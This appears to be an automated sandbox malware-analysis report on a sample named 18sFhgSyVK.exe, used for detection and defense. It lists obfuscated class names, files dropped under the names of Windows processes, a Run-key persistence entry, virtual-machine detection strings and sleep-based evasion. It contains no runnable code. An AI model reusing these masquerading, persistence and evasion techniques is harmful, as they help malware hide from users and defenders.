Source: StartMenuExperienceHost.exe.4.dr, CQg6RO8lWJcEYht.cs	High entropy of concatenated method names: 'Oo2VpJ8DA9dfSFJ', 'TdMOqWUpSawR8y67wO4vBTN7LteXwycr', 'qcowZOmbo9NRKRXvG7K0zCJX9Q8i4A5x', 'RE5foa9s72iXmDoDRb1bl6pa7n5TBJIF', 'mGiE2pwrLOyOjbM6DrU658lmrGzuSbMm'
Source: StartMenuExperienceHost.exe.4.dr, k7DEUthG3QSrccC.cs	High entropy of concatenated method names: 'baNNnFSKLXWA2Vp', 'TmugH64xJCiIMPp', 'KZTeDrkeZn9BeSf', 'vI6F9EiF4ibw3FL', 'uTHL0d6K4N56D43', '_92fzp0lF8SeY0E2', '_7RfOR0iXoxN4vU0', 'VFBbV1GiS4LQYTR', 'B9j38p5xby1352z', 'cQhKayGAR9Fenqg'
Source: StartMenuExperienceHost.exe.4.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.cs	High entropy of concatenated method names: 'kgZC0xlCkJHHvkk7kg8bpMGjU3Pib4N60QrK0gdb', '_6OORxCIRtmjnnts0LQZCrfz6gCGkOEFWGy2YGy29', '_8qL3IO7vaZbJ9xmA4UmVVNVxn0vbUiEXJkpv53JX', 'M9hJnsyccWtdo6Vy1EEAHfojlM2H0Yj3L1M9lIaS', 'Ks8Hu8iWSZ2Q1AtCF15qJz5FzJ0hN0HuhnDHgYCh', 'kiczvmGtaXkejXlQnRNyqUZhu1JTZXDnPndslR35', 'JpSkYAfaZhVhp6yTUEUEFdTOaSwALU95Jox0fSyi', 'w0JnMFB1e7LCKlTka0EshC4imbiB3iaHKIp8oSde', 'kgONNwqduucn7ErvHGUsGLHTXff3wXZ0f0PaHxQi', 'eL0TZe4MYmBtdnGq5xTBAu9HxwDnN33uFE4oS2IW'
Source: svchost.exe.12.dr, YuWwnU774i1WXQz.cs	High entropy of concatenated method names: 'zoPwAT5CIxrIHgi', 'FKGpPlnraXbM1ZF', 'jXiKhZ2WRX9rqip', '_4YgkMx1W2VQBhkBo9H', 'Mtx16zRUzpofifFREl', 'vftrbwcfQzEo1ZL9A3', '_7PBY7FZQF55DjK1Cov', 'TLX2HhdljB2mEAtMSY', 'MIewFAlfiNh37TUukE', 'VlvzphW9ZDbWXg1odi'
Source: svchost.exe.12.dr, BYZXqCcInfvLxkJ.cs	High entropy of concatenated method names: 'HmYB37sUGn1tzWo', 'SwJtMaiww3xwhlt', '_2Ncrum7fWL0LZSI3UTXJdSgAbrxu50NP', 'KJck06XP8a2RC4x3RbNNtnEWeVWVU5RK', 'o2ayMkAsm2MJl7DzCGVCewxkkEXGw9pv', 'XsgoBl2zFUtxhxO7iFYbTblPAMzBMdo8'
Source: svchost.exe.12.dr, vxw6fPaLgCWKUy0.cs	High entropy of concatenated method names: 'bsRhaVEy8neLH0G', 'gQeMuKYZfmdfalx', 'a8ZGWF4Ze61pADc', 'BPZ5AL5H8T2eyhW', 'cIvhfw92JPAMmOxZlGFpa6dJWdcGwybE', 'xp2ouzuaCyVa0e3eVHsOzzb0qWY8YtLE', 'ESgVaOnZruQgSXv7dUJbyII9HmUzzpcM', 'lmYfT7g04ToPYZcDY8skWi5KCol1VIKc', 'AfqADcwUoxdRdfpzT2f6Gr6do4dtwHRR', 'WWL0XENC3bSs0kDawIY7qmuVJ47WHNcZ'
Source: svchost.exe.12.dr, 4YsgSk8wbMoiiRy.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'kaAfXKhhGgwVbpY', 'ZuyftoEJOIUteV19hRJzXvsttxsbIVQE', 'FXMAjIdHzuejPKublxja7znJenaoewZ4', 'THmHOhpw81AE8MOOZCRn7a0aYF6RPxJZ', 'PEC4vmGtLYWCB1RoZF9K5OzyWH2kigrV'
Source: svchost.exe.12.dr, RGgnftDWPPpsIjGTcvO1OpP8vWPkDEV58d5cxkAlUabCGJ3GABiiQ81jRyxmvPvrtAm4lXCj.cs	High entropy of concatenated method names: 'ORiC8emOPRQGOXpPv83ulthuW6CVQ6YM4xTAjZ2jPRAoP9wiEOfLSrtcMcVNycVBuUDSk2rB', 'AceLNnYLfssv5xNkhIBxOpI2MxBiQXzE', 'krotEk14oyz0ZE7dRR97UUit8vJqRAkB', 'kRUj6xBlZyurP2lRnqqZjyfmGywk0gbR', 'xsPGLSQ1yo77J0S7jujyES9FLI86EBg1'
Source: svchost.exe.12.dr, XqLRt2iKMxTUA2h4rXCpIUvAUqRYRR5QrACB1BMG.cs	High entropy of concatenated method names: 'l6xBdqb0bhFOmil6dHylKViFfsdgGKvRJk6esdwo', 'SNU29fbBoCjckaVAB9UgMQV0JgKVgsN6yzd6huJ3', 'qc88vInX2XwZwshFbCgXe3OVAw7r9h3qu6VvVOyz', 'Vlcok3h04GLc88cDOnru26nx5ciYbJJaxeObu95U', '_7fyohtCQd9HltSGvlCh4tY4hXjO9K4W56xjZOh0y', 'FYvEJEAauCvrzK4SAEAXEftUcg1Y3DLHHy84Q6E4', 'P8qnLG95P6quuFElwnzpmvpx1UFiMYwaN0X3Tl5f', 'TdTY4rZk0TCcYFml7X4XfCA4ztEWOTb43FyTMja1', 'Qq5pVkiqLGsEZ5anpF0Ym6XKaLY63thUytWoxwSR', 'Jfmk5g6q8jjPsHj0gP4kKAcor9y15M3BKKlOda82'
Source: svchost.exe.12.dr, 2ZsuPbqCBQvbqJJvnkg9IdlWfbr0LmDXH0wXVeMuDAdpKCo8t7EgBvOlnRI4Spu7Koww44lw.cs	High entropy of concatenated method names: 'OBy0ZRAIl27FCEGiYcN9v20B0ApQ6svlHIBlVvq7GViELUIicS9JbY2KMhq58KS9Knd8QBm8', 'vW3Z6eetIFV12B3ix3zdScvW81U6867oGrNe5wk2zZIiVJpIgd0gNvOZvz5vc5nkoDupLdG7', 'AfmZWlx8we4jinH1fpygtayywMwVfzIlMlUkX2BWNgIggiHReOyZCL6zks0UqQOiDCp0DRkI', 'a6IeH8rYFq5qZ30UJiPfTxhDwk66gTOJDXy1aK69WuyJ5hrDX52lC233ac3SOAsBs5g40You', 'CK0cM9yaSZQZ7inxdCslngKIXOLY9Et7yOmvKcyz2q9Wnbk7ZP2yJtQqacaPMLRTvUR0xOv5', 'mhzDKktfAFZgNabYnqjDgO0cu8f6bsRW9Jj6QRvG8K2ls65zW5v9MOb72oauprJMj9Gd4A84', 'CjEQcs6fYlnaFXk0b70e9C47jALT8MEiWlYjpuH9xOvSnYuWuewRnrpWUtSxBQObqChDzpAl', 'ycr9eocoI9ydvfkVn6vo1JrLKfJrUZupOceBW2NqwfXuCZokg05vIMiQuVvyjpRR0fSkWERq', 'klc47EgajQ5XpcbHKWaHrsg8gMtxxevNa6VI6lKeWZaWzl3IR9xs5BUHO7epHk3p4ulIgkz9', 'uX324uFDfb1twezydRxB4KiQLijU68Yegli535SbeNvVPGE7Xp5fffHy8gP84lIHUygonIVm'
Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs	High entropy of concatenated method names: 'GvngXKg6lLmy5vBBHSIzLkyqFBS6K9rdghWoJ7tDAXccsi5qovHalv8i7XgquXawMbM1XU9l', 'CQN4IzuYh6n5hW0DT5CXNjlmgQqGp0FQw5BTdVkNg8hnfElRcRaeHbBkrnFuMbes2eJ5RuKT', 'JXsDlFCsoB8yBkNQYyxgMmj4evDB48lW49wM1d961DQ9pcCWsGJkVCfTIart3WCT8opHL9uO', '_0vFa2dvnZUAKRVobWqAPtd0ly2YwziIbyyB0PzJ6fbIZPMhwRabsAfUKxjEBN4MGScvTHloB', '_8KUyxFtwan6UXk4kxwDH1xBAWmZc5UKkz4dvjelYE5TcImdSrKy13wRisPMNEr3L4aPBglyq', 'c8FaDnpWxHYsYI1B2daqv7tsym5SfFGRdcBU5yqFDFGueYlDC8PN3nnkqprMYkHLdPSh9mdX', 'VizLtxeppd42kEqbbvfx4oohKXA4LvFFjm0at7tlVraTFTOW1gBDSuVwE46rD5txVKdyT0dY', 'YWKd05bA2ZBL4jKDtELGLuGXpd4MlJ7PAij6Vk0WVLCm61Yja0VeokNUy12ckNEmsINakcdE', 'lMluw0ZsmqwdPD3wI8oYS2YDmg29UpJctqjvby0Di97UuxjK6w7f9BIDryX8Qvs5kMATj3lj', '_2gmJrYMIeqZZvfYyKnN6sXqTyj34Q0QLieSDM4TpwsCtPS9le2aXAgPtdMdXTlfcjOpNyawl'
Source: svchost.exe.12.dr, CQg6RO8lWJcEYht.cs	High entropy of concatenated method names: 'Oo2VpJ8DA9dfSFJ', 'TdMOqWUpSawR8y67wO4vBTN7LteXwycr', 'qcowZOmbo9NRKRXvG7K0zCJX9Q8i4A5x', 'RE5foa9s72iXmDoDRb1bl6pa7n5TBJIF', 'mGiE2pwrLOyOjbM6DrU658lmrGzuSbMm'
Source: svchost.exe.12.dr, k7DEUthG3QSrccC.cs	High entropy of concatenated method names: 'baNNnFSKLXWA2Vp', 'TmugH64xJCiIMPp', 'KZTeDrkeZn9BeSf', 'vI6F9EiF4ibw3FL', 'uTHL0d6K4N56D43', '_92fzp0lF8SeY0E2', '_7RfOR0iXoxN4vU0', 'VFBbV1GiS4LQYTR', 'B9j38p5xby1352z', 'cQhKayGAR9Fenqg'
Source: svchost.exe.12.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.cs	High entropy of concatenated method names: 'kgZC0xlCkJHHvkk7kg8bpMGjU3Pib4N60QrK0gdb', '_6OORxCIRtmjnnts0LQZCrfz6gCGkOEFWGy2YGy29', '_8qL3IO7vaZbJ9xmA4UmVVNVxn0vbUiEXJkpv53JX', 'M9hJnsyccWtdo6Vy1EEAHfojlM2H0Yj3L1M9lIaS', 'Ks8Hu8iWSZ2Q1AtCF15qJz5FzJ0hN0HuhnDHgYCh', 'kiczvmGtaXkejXlQnRNyqUZhu1JTZXDnPndslR35', 'JpSkYAfaZhVhp6yTUEUEFdTOaSwALU95Jox0fSyi', 'w0JnMFB1e7LCKlTka0EshC4imbiB3iaHKIp8oSde', 'kgONNwqduucn7ErvHGUsGLHTXff3wXZ0f0PaHxQi', 'eL0TZe4MYmBtdnGq5xTBAu9HxwDnN33uFE4oS2IW'

Source: C:\Windows\System32\curl.exe	File created: C:\Windows\StartMenuExperienceHost.exe			Jump to dropped file
Source: C:\Windows\StartMenuExperienceHost.exe	File created: C:\Users\user\AppData\Local\Temp\svchost.exe			Jump to dropped file

Source: C:\Windows\StartMenuExperienceHost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior

Source: C:\Windows\StartMenuExperienceHost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\StartMenuExperienceHost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\StartMenuExperienceHost.exe	Memory allocated: 1270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Memory allocated: 1AE20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: 3140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: 1B140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: 1550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: 1B1A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: 1AAA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: BB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: 1AAA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: 3200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: 1B200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: 15A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: 1B1A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: FF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Memory allocated: 1AFA0000 memory reserve \| memory write watch

Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 599256	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 599115	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 598889	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 598555	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 598451	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 598232	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 597465	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 597244	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 597137	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 597030	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 596917	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 596783	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 596298	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 596121	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 596014	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 595577	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 595466	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 595356	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 595248	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Thread delayed: delay time: 595139	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Window / User API: threadDelayed 9998	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 9392	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Window / User API: threadDelayed 3568	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Window / User API: threadDelayed 6256	Jump to behavior

Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -38738162554790034s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -599256s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -599115s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -598889s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -598555s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -598451s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -598232s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -598124s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -597465s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -597244s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -597137s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -597030s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -596917s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -596783s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -596298s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -596121s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -596014s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -595577s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -595466s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -595356s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -595248s >= -30000s	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244	Thread sleep time: -595139s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7280	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7452	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7608	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7688	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 8160	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 3028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7760	Thread sleep time: -922337203685477s >= -30000s

Windows Analysis Report 18sFhgSyVK.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
18sFhgSyVK.exe

Malware Threat Intel
Provided by

Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\Windows\System32 FullSizeInformation	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	File Volume queried: C:\ FullSizeInformation

Source: StartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.dr	Binary or memory string: gQeMuKYZfmdfalx
Source: svchost.exe, 00000007.00000002.3719577927.000002B128E64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000007.00000002.3719311899.000002B128E4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe.12.dr	Binary or memory string: vmware
Source: svchost.exe, 00000007.00000002.3719577927.000002B128E7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000007.00000002.3719130118.000002B128E2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: StartMenuExperienceHost.exe, 0000000C.00000002.3724054665.000000001BD0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: svchost.exe, 00000007.00000002.3718902466.000002B128E02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000007.00000002.3719807106.000002B128F02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000007.00000002.3719311899.000002B128E4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: curl.exe, 00000004.00000003.1272935149.0000016CB93A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3719238486.000002117C22B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\StartMenuExperienceHost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Code function: 0_2_00007FF77C9207B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF77C9207B4
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Code function: 0_2_00007FF77C920E04 SetUnhandledExceptionFilter,	0_2_00007FF77C920E04
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Code function: 0_2_00007FF77C920C5C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF77C920C5C

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
